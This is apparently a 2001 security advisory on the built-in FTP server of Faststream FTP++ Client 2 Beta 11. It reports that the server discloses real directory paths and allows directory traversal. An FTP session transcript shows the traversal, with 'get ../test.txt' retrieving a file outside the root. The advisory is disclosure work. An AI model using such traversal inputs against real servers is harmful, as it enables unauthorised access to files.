Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability

2001-03-05T00:00:00
ID SECURITYVULNS:DOC:1350
Type securityvulns
Reporter Securityvulns
Modified 2001-03-05T00:00:00

Description

Faststram FTP built in server responds with the real path of directory instead of a virtual one.It is possible to get files outside of root.dir.

e:\crap was used as root directory

  1. directory path

230 User anonymous logged in. ftp> pwd 257 "/E:/crap/" is current directory.

  1. getting files from outside of root

ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 . drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .. drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt -rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu 226 File sent ok FTP: 438 Bytes empfangen in 0,00Sekunden 438000,00KB/s ftp> get ../test.txt 200 Port command successful. 150 Opening data connection for ../test.txt. 226 File sent ok FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s

Solution: no quick fix possible.Use with care.

Author has been contacted on 04.Mar.2001

se00020@fhs-hagenberg.ac.at se00020@lion.cc